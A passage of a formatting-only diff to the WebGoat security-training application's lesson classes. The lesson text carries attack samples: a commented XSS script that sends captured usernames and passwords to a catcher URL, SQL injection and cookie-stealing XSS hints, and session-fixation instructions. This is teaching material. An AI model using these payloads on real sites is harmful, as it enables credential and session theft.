-					"connection. The URL should start with https:// " +
+					+ "If your browser is complaining about the certificate just "
-					"If your browser is complaining about the certificate just " +
+					+ "ignore it. Sniff again the traffic and answer the" + " questions";
-					"ignore it. Sniff again the traffic and answer the" +
-					" questions";
 		}
 		return instructions;
 	}
@@ -273,8 +265,7 @@ public class InsecureLogin extends SequentialLessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -282,8 +273,7 @@ public class InsecureLogin extends SequentialLessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}
@@ -359,7 +349,6 @@ public class InsecureLogin extends SequentialLessonAdapter
 			ec.addElement(createSSLQuestionContent());
 		}
 
-		
 		return ec;
 	}
 
@@ -430,7 +419,6 @@ public class InsecureLogin extends SequentialLessonAdapter
 		protocolSelect.addElement(tlsOption);
 		td4.addElement(protocolSelect);
 
-
 		div.addElement(selectTable);
 
 		div.addElement(new Input(Input.SUBMIT, "Submit", "Submit"));
@@ -463,8 +451,7 @@ public class InsecureLogin extends SequentialLessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -472,8 +459,7 @@ public class InsecureLogin extends SequentialLessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/LessonAdapter.java

@@ -144,8 +144,6 @@ public abstract class LessonAdapter extends AbstractLesson
 		return hints;
 	}
 
-
-
 	/**
 	 * Gets the credits attribute of the AbstractLesson object
 	 * 

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/MultiLevelLogin1.java

@@ -143,26 +143,26 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
 			style sty = new style();
 
 			sty
-					.addElement("#lesson_wrapper {height: 435px;width: " +
+					.addElement("#lesson_wrapper {height: 435px;width: "
-							"500px;}#lesson_header {background-image: " +
+							+ "500px;}#lesson_header {background-image: "
-							"url(lessons/DBSQLInjection/images/lesson1_header.jpg);width:" +
+							+ "url(lessons/DBSQLInjection/images/lesson1_header.jpg);width:"
-							" 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace " +
+							+ " 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace "
-							"{background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: " +
+							+ "{background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: "
-							"325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}		" +
+							+ "325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}		"
-							".lesson_text {height: 240px;width: 460px;padding-top: 5px;}			" +
+							+ ".lesson_text {height: 240px;width: 460px;padding-top: 5px;}			"
-							"#lesson_buttons_bottom {height: 20px;width: 460px;}			" +
+							+ "#lesson_buttons_bottom {height: 20px;width: 460px;}			"
-							"#lesson_b_b_left {width: 300px;float: left;}			" +
+							+ "#lesson_b_b_left {width: 300px;float: left;}			"
-							"#lesson_b_b_right input {width: 100px;float: right;}			" +
+							+ "#lesson_b_b_right input {width: 100px;float: right;}			"
-							".lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}			" +
+							+ ".lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}			"
-							".lesson_workspace { }			" +
+							+ ".lesson_workspace { }			"
-							".lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}			" +
+							+ ".lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}			"
-							".lesson_text_db {color: #0066FF}			" +
+							+ ".lesson_text_db {color: #0066FF}			"
-							"#lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: " +
+							+ "#lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: "
-							"124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top:" +
+							+ "124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top:"
-							" 50px;text-align: center;}			#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: " +
+							+ " 50px;text-align: center;}			#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: "
-							"12px;text-align: center;}			#lesson_search {background-image: " +
+							+ "12px;text-align: center;}			#lesson_search {background-image: "
-							"url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: " +
+							+ "url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: "
-							"no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}");
+							+ "no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}");
 			ec.addElement(sty);
 
 			Div wrapperDiv = new Div();
@@ -501,8 +501,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -510,8 +509,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}
@@ -538,8 +536,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -547,8 +544,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}
@@ -594,8 +590,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -603,8 +598,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}
@@ -638,8 +632,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -647,8 +640,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}
@@ -700,8 +692,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}
@@ -740,8 +731,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -749,8 +739,7 @@ public class MultiLevelLogin1 extends SequentialLessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/MultiLevelLogin2.java

@@ -502,8 +502,7 @@ public class MultiLevelLogin2 extends LessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -511,8 +510,7 @@ public class MultiLevelLogin2 extends LessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}
@@ -545,8 +543,7 @@ public class MultiLevelLogin2 extends LessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -554,8 +551,7 @@ public class MultiLevelLogin2 extends LessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}
@@ -583,8 +579,7 @@ public class MultiLevelLogin2 extends LessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -592,8 +587,7 @@ public class MultiLevelLogin2 extends LessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}
@@ -634,8 +628,7 @@ public class MultiLevelLogin2 extends LessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -643,8 +636,7 @@ public class MultiLevelLogin2 extends LessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}
@@ -686,8 +678,7 @@ public class MultiLevelLogin2 extends LessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -695,8 +686,7 @@ public class MultiLevelLogin2 extends LessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}
@@ -749,8 +739,7 @@ public class MultiLevelLogin2 extends LessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -758,8 +747,7 @@ public class MultiLevelLogin2 extends LessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java

@@ -226,12 +226,12 @@ public class Phishing extends LessonAdapter
 		 * password<script>function hack(){ alert("Had this been a real attack... Your credentials
 		 * were just stolen.\nUser Name = " + document.forms[0].user.value + "\nPassword = " +
 		 * document.forms[0].pass.value); XSSImage=new Image;
-		 * XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+document.forms[0].user.value +
+		 * XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="
-		 * "&password=" + document.forms[0].pass.value + "";}</script><form><br>
+		 * +document.forms[0].user.value + "&password=" + document.forms[0].pass.value +
+		 * "";}</script><form><br>
 		 * <br>
 		 * <HR>
-		 * <H3>This feature requires account login:</H2>
+		 * <H3>This feature requires account login:</H2> <br>
-		 * <br>
 		 * <br>
 		 * Enter Username:<br>
 		 * <input type="text" id="user" name="user"><br>

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java

@@ -85,7 +85,8 @@ public class RemoteAdminFlaw extends LessonAdapter
 		List<String> hints = new ArrayList<String>();
 		hints.add("WebGoat has 2 admin interfaces.");
 		hints.add("WebGoat has one admin interface that is controlled via a URL parameter and is 'hackable'");
-		hints.add("WebGoat has one admin interface that is controlled via server side security constraints and should not be 'hackable'");
+		hints
+				.add("WebGoat has one admin interface that is controlled via server side security constraints and should not be 'hackable'");
 		hints.add("Follow the Source!");
 		hints.add("On success you will see new submenu items in the menupoint 'Admin Functions'");
 

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java

@@ -97,8 +97,8 @@ public class EditProfile extends DefaultLessonAction
 									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 					/*
-					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
 					 */}
 			} catch (SQLException sqle)
 			{
@@ -145,8 +145,8 @@ public class EditProfile extends DefaultLessonAction
 									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 					/*
-					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
 					 */}
 			} catch (SQLException sqle)
 			{

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java

@@ -93,7 +93,6 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
 		return Category.ACCESS_CONTROL;
 	}
 
-
 	/**
 	 * Gets the hints attribute of the DirectoryScreen object
 	 * 
@@ -111,18 +110,15 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
 
 		hints.add("Stage1: How does the application know that the user selected the delete function?");
 
-
 		hints.add("Stage2: You have to code to check the authorization of the user for the action.");
 		// Stage 2
 
-	
-
 		// Stage 3
 		hints.add("Stage3: How does the application know that the user selected any particular employee to view?");
 
-
 		// Stage 4
-		hints.add("Stage4: You have to code to check the authorization of the user for the action on a certain employee.");
+		hints
+				.add("Stage4: You have to code to check the authorization of the user for the action on a certain employee.");
 
 		return hints;
 	}
@@ -155,8 +151,8 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
 			}
 			else if (STAGE2.equals(stage))
 			{
-				instructions ="Stage 2: Add Business Layer Access Control.<br><br/>" +
+				instructions = "Stage 2: Add Business Layer Access Control.<br><br/>"
-				"<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
+						+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
 						+ "Implement a fix to deny unauthorized access to the Delete function. "
 						+ "Repeat stage 1.  Verify that access to Delete is properly denied.<br/>"
 						+ "To do this you have to alter code.";
@@ -168,8 +164,8 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
 			}
 			else if (STAGE4.equals(stage))
 			{
-				instructions = "Stage 4: Add Data Layer Access Control.<br><br/>" +
+				instructions = "Stage 4: Add Data Layer Access Control.<br><br/>"
-					"<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
+						+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
 						+ "Implement a fix to deny unauthorized access to this data. "
 						+ "Repeat stage 3.  Verify that access to other employee's profiles is properly denied.";
 			}
@@ -178,7 +174,8 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
 		return instructions;
 	}
 
-	public String getLessonSolutionFileName(WebSession s) {
+	public String getLessonSolutionFileName(WebSession s)
+	{
 		String solutionFileName = null;
 		String stage = getStage(s);
 		solutionFileName = "/lesson_solutions/Lab Access Control/Lab " + stage + ".html";
@@ -186,12 +183,14 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
 	}
 
 	@Override
-	public String getSolution(WebSession s) {
+	public String getSolution(WebSession s)
+	{
 		String src = null;
 
 		try
 		{
-			src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), false);
+			src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))),
+								false);
 		} catch (IOException e)
 		{
 			s.setMessage("Could not find the solution file");
@@ -235,8 +234,6 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
 				{
 					// ***************CODE HERE*************************
 
-					
-					
 					// *************************************************
 					if (action.isAuthenticated(s))
 					{

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java

@@ -125,8 +125,8 @@ public class ViewProfile extends DefaultLessonAction
 									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 					/*
-					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
 					 */}
 			} catch (SQLException sqle)
 			{
@@ -171,8 +171,8 @@ public class ViewProfile extends DefaultLessonAction
 									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 					/*
-					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
 					 */}
 			} catch (SQLException sqle)
 			{

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java

@@ -250,12 +250,14 @@ public class SQLInjection extends GoatHillsFinancial
 	}
 
 	@Override
-	public String getSolution(WebSession s) {
+	public String getSolution(WebSession s)
+	{
 		String src = null;
 
 		try
 		{
-			src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), false);
+			src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))),
+								false);
 		} catch (IOException e)
 		{
 			s.setMessage("Could not find the solution file");
@@ -264,7 +266,8 @@ public class SQLInjection extends GoatHillsFinancial
 		return src;
 	}
 
-	public String getLessonSolutionFileName(WebSession s) {
+	public String getLessonSolutionFileName(WebSession s)
+	{
 		String solutionFileName = null;
 		String stage = getStage(s);
 		solutionFileName = "/lesson_solutions/Lab SQL Injection/Lab " + stage + ".html";

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java

@@ -119,8 +119,8 @@ public class ViewProfile extends DefaultLessonAction
 									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 					// System.out.println("Profile: " + profile);
 					/*
-					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
 					 */}
 			} catch (SQLException sqle)
 			{
@@ -167,8 +167,8 @@ public class ViewProfile extends DefaultLessonAction
 									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 					/*
-					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
 					 */}
 			} catch (SQLException sqle)
 			{

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java

@@ -3,7 +3,6 @@ package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/SessionFixation.java

@@ -7,7 +7,6 @@ import java.sql.ResultSet;
 import java.util.ArrayList;
 import java.util.List;
 import java.util.Random;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -231,9 +230,9 @@ public class SessionFixation extends SequentialLessonAdapter
 	private Element createStage4Content(WebSession s)
 	{
 		ElementContainer ec = new ElementContainer();
-		ec.addElement("<h2>Jane has logged into her account. Go and grab her session!" +
+		ec.addElement("<h2>Jane has logged into her account. Go and grab her session!"
-				" Use Following link to reach the login screen of the bank:</h2><br><br>" +
+				+ " Use Following link to reach the login screen of the bank:</h2><br><br>" + "<a href="
-				"<a href=" + super.getLink() +"&SID=NOVALIDSESSION><center> Goat Hills Financial </center></a><br><br><br><br>");
+				+ super.getLink() + "&SID=NOVALIDSESSION><center> Goat Hills Financial </center></a><br><br><br><br>");
 		return ec;
 		// return createMainLoginContent(s);
 	}
@@ -446,7 +445,6 @@ public class SessionFixation extends SequentialLessonAdapter
 		return ec;
 	}
 
-
 	/**
 	 * See if the password and corresponding user is valid
 	 * 
@@ -478,8 +476,7 @@ public class SessionFixation extends SequentialLessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -487,14 +484,12 @@ public class SessionFixation extends SequentialLessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}
 		}
 
-
 		return false;
 
 	}
@@ -650,8 +645,7 @@ public class SessionFixation extends SequentialLessonAdapter
 		} catch (Exception e)
 		{
 			e.printStackTrace();
-		}
+		} finally
-		finally
 		{
 			try
 			{
@@ -659,8 +653,7 @@ public class SessionFixation extends SequentialLessonAdapter
 				{
 					connection.close();
 				}
-			}
+			} catch (Exception e)
-			catch (Exception e)
 			{
 				e.printStackTrace();
 			}
@@ -716,8 +709,6 @@ public class SessionFixation extends SequentialLessonAdapter
 		hints.add("Stage 4: What is your actual SID?");
 		hints.add("Stage 4: Change the SID (NOVALIDSESSION) to the choosen one in the mail");
 
-
-
 		return hints;
 
 	}
@@ -735,32 +726,29 @@ public class SessionFixation extends SequentialLessonAdapter
 		String instructions = "STAGE " + stage + ": ";
 		if (stage == 1)
 		{
-			instructions += "You are Hacker Joe and " +
+			instructions += "You are Hacker Joe and " + "you want to steal the session from Jane. "
-					"you want to steal the session from Jane. " +
+					+ "Send a prepared email to the victim " + "which looks like an official email from the bank.  "
-					"Send a prepared email to the victim " +
+					+ "A template message is prepared below, you will need to add "
-					"which looks like an official email from the bank.  " +
+					+ "a Session ID (SID) in the link inside the email. Alter "
-					"A template message is prepared below, you will need to add " +
+					+ "the link to include a SID.<br><br><b>You are: Hacker Joe</b>";
-					"a Session ID (SID) in the link inside the email. Alter " +
-					"the link to include a SID.<br><br><b>You are: Hacker Joe</b>";
 		}
 		else if (stage == 2)
 		{
-			instructions += "Now you are the victim Jane who received the email below. " +
+			instructions += "Now you are the victim Jane who received the email below. "
-					"If you point on the link with your mouse you will see that there is a SID included. " +
+					+ "If you point on the link with your mouse you will see that there is a SID included. "
-					"Click on it to see what happens.<br><br><b>You are: Victim Jane</b> ";
+					+ "Click on it to see what happens.<br><br><b>You are: Victim Jane</b> ";
 		}
 		else if (stage == 3)
 		{
-			instructions += "The bank has asked you to verfy your data. Log in to see if your details are "  +
+			instructions += "The bank has asked you to verfy your data. Log in to see if your details are "
-					"correct. Your user name is <b>Jane</b> and your password is <b>tarzan</b>. <br><br><b>You are: Victim Jane</b> ";
+					+ "correct. Your user name is <b>Jane</b> and your password is <b>tarzan</b>. <br><br><b>You are: Victim Jane</b> ";
 		}
 		else if (stage == 4)
 		{
-			instructions += "It is time to steal the session now. Use following link to reach Goat Hills " +
+			instructions += "It is time to steal the session now. Use following link to reach Goat Hills "
-					"Financial.<br><br><b>You are: Hacker Joe</b> ";
+					+ "Financial.<br><br><b>You are: Hacker Joe</b> ";
 		}
 
-
 		return (instructions);
 	}
 
@@ -798,14 +786,10 @@ public class SessionFixation extends SequentialLessonAdapter
 	public String getLink()
 	{
 
-		if(sid.equals(""))
+		if (sid.equals("")) { return super.getLink(); }
-		{
-			return super.getLink();
-		}
 		return super.getLink() + "&SID=" + sid;
 	}
 
-
 	private String randomSIDGenerator()
 	{
 		String sid = "";

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java

@@ -56,8 +56,8 @@ import org.owasp.webgoat.session.WebgoatContext;
  * 
  * @author asmolen
  * 
- * TODO To change the template for this generated type comment go to Window - Preferences - Java -
+ *         TODO To change the template for this generated type comment go to Window - Preferences -
- * Code Style - Code Templates
+ *         Java - Code Style - Code Templates
  */
 public class SoapRequest extends SequentialLessonAdapter
 {

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/SqlNumericInjection.java

@@ -310,13 +310,13 @@ public class SqlNumericInjection extends SequentialLessonAdapter
 	protected List<String> getHints(WebSession s)
 	{
 		List<String> hints = new ArrayList<String>();
-		hints.add("The application is taking the input from the select box and inserts it at the end of a pre-formed SQL command.");
+		hints
+				.add("The application is taking the input from the select box and inserts it at the end of a pre-formed SQL command.");
 		hints.add("This is the code for the query being built and issued by WebGoat:<br><br> "
 				+ "\"SELECT * FROM weather_data WHERE station = \" + station ");
 		hints.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. "
 				+ "Try appending a SQL statement that always resolves to true.");
-		hints.add("Try to intercept the post request with WebScarab and replace the station " +
+		hints.add("Try to intercept the post request with WebScarab and replace the station " + "with 101 OR 1 = 1");
-				"with 101 OR 1 = 1");
 
 		return hints;
 	}

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/StoredXss.java

@@ -79,6 +79,7 @@ public class StoredXss extends LessonAdapter
 	private static int count = 1;
 
 	private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted
+
 	// message
 
 	/**
@@ -160,7 +161,8 @@ public class StoredXss extends LessonAdapter
 		List<String> hints = new ArrayList<String>();
 		hints.add("You can put HTML tags in your message.");
 		hints.add("Bury a SCRIPT tag in the message to attack anyone who reads it.");
-		hints.add("Enter this: &lt;script language=\"javascript\" type=\"text/javascript\"&gt;alert(\"Ha Ha Ha\");&lt;/script&gt; in the message field.");
+		hints
+				.add("Enter this: &lt;script language=\"javascript\" type=\"text/javascript\"&gt;alert(\"Ha Ha Ha\");&lt;/script&gt; in the message field.");
 		hints.add("Enter this: &lt;script&gt;alert(document.cookie);&lt;/script&gt; in the message field.");
 
 		return hints;

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java

@@ -131,7 +131,8 @@ public class UncheckedEmail extends LessonAdapter
 				s.setMessage("The attack worked! Now try to attack another person than the admin.");
 			}
 
-			// only complete the lesson if they changed the "to" hidden field and they sen a scripttag in the message
+			// only complete the lesson if they changed the "to" hidden field and they sen a
+			// scripttag in the message
 			if (to.length() > 0 && !"webgoat.admin@owasp.org".equals(to) && message.contains("<script"))
 			{
 				makeSuccess(s);

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/WSDLScanning.java

@@ -65,8 +65,8 @@ import org.owasp.webgoat.session.WebgoatContext;
  * 
  * @author asmolen
  * 
- * TODO To change the template for this generated type comment go to Window - Preferences - Java -
+ *         TODO To change the template for this generated type comment go to Window - Preferences -
- * Code Style - Code Templates
+ *         Java - Code Style - Code Templates
  */
 public class WSDLScanning extends LessonAdapter
 {

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/WelcomeScreen.java

@@ -141,7 +141,6 @@ public class WelcomeScreen extends Screen
 
 	/*
 	 * (non-Javadoc)
-	 * 
 	 * @see session.Screen#getRole()
 	 */
 	public String getRole()

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/WsSAXInjection.java

@@ -56,8 +56,8 @@ import org.xml.sax.helpers.XMLReaderFactory;
  * 
  * @author rdawes
  * 
- * TODO To change the template for this generated type comment go to Window - Preferences - Java -
+ *         TODO To change the template for this generated type comment go to Window - Preferences -
- * Code Style - Code Templates
+ *         Java - Code Style - Code Templates
  */
 public class WsSAXInjection extends LessonAdapter
 {

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/WsSqlInjection.java

@@ -55,8 +55,8 @@ import org.owasp.webgoat.session.WebgoatContext;
  * 
  * @author asmolen
  * 
- * TODO To change the template for this generated type comment go to Window - Preferences - Java -
+ *         TODO To change the template for this generated type comment go to Window - Preferences -
- * Code Style - Code Templates
+ *         Java - Code Style - Code Templates
  */
 public class WsSqlInjection extends LessonAdapter
 {
@@ -72,7 +72,6 @@ public class WsSqlInjection extends LessonAdapter
 
 	/*
 	 * (non-Javadoc)
-	 * 
 	 * @see lessons.AbstractLesson#getMenuItem()
 	 */
 	static boolean completed;

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/CrossSiteScripting/FindProfile_i.java

@@ -1,8 +1,7 @@
+
 package org.owasp.webgoat.lessons.instructor.CrossSiteScripting;
 
-
 import java.util.regex.Pattern;
-
 import org.owasp.webgoat.lessons.CrossSiteScripting.FindProfile;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
@@ -10,23 +9,15 @@ import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/* STAGE 5 FIXES
-Solution Summary: Edit FindProfile.java and change getRequestParameter().  
-                  Modify getRequestParameter() with lines denoted by // STAGE 5 - FIX.
-Solution Steps: 
-1. Talk about the different parser methods.  We could have used the parser method that takes a regular expression.
-2. Call validate on the request parameter.
-		return validate(s.getParser().getRawParameter(name), (Pattern) patterns.get(name));
-
-    Note: patterns.get(name) is used to fetch the XSS validation pattern that is defined
-          in FindProfile.Java
-          
-      protected static Map patterns = new HashMap();
-		static
-		{
-			patterns.put(CrossSiteScripting.SEARCHNAME, Pattern.compile("[a-zA-Z ]{0,20}"));
-		}
 
+/*
+ * STAGE 5 FIXES Solution Summary: Edit FindProfile.java and change getRequestParameter(). Modify
+ * getRequestParameter() with lines denoted by // STAGE 5 - FIX. Solution Steps: 1. Talk about the
+ * different parser methods. We could have used the parser method that takes a regular expression.
+ * 2. Call validate on the request parameter. return validate(s.getParser().getRawParameter(name),
+ * (Pattern) patterns.get(name)); Note: patterns.get(name) is used to fetch the XSS validation
+ * pattern that is defined in FindProfile.Java protected static Map patterns = new HashMap(); static
+ * { patterns.put(CrossSiteScripting.SEARCHNAME, Pattern.compile("[a-zA-Z ]{0,20}")); }
  */
 
 public class FindProfile_i extends FindProfile
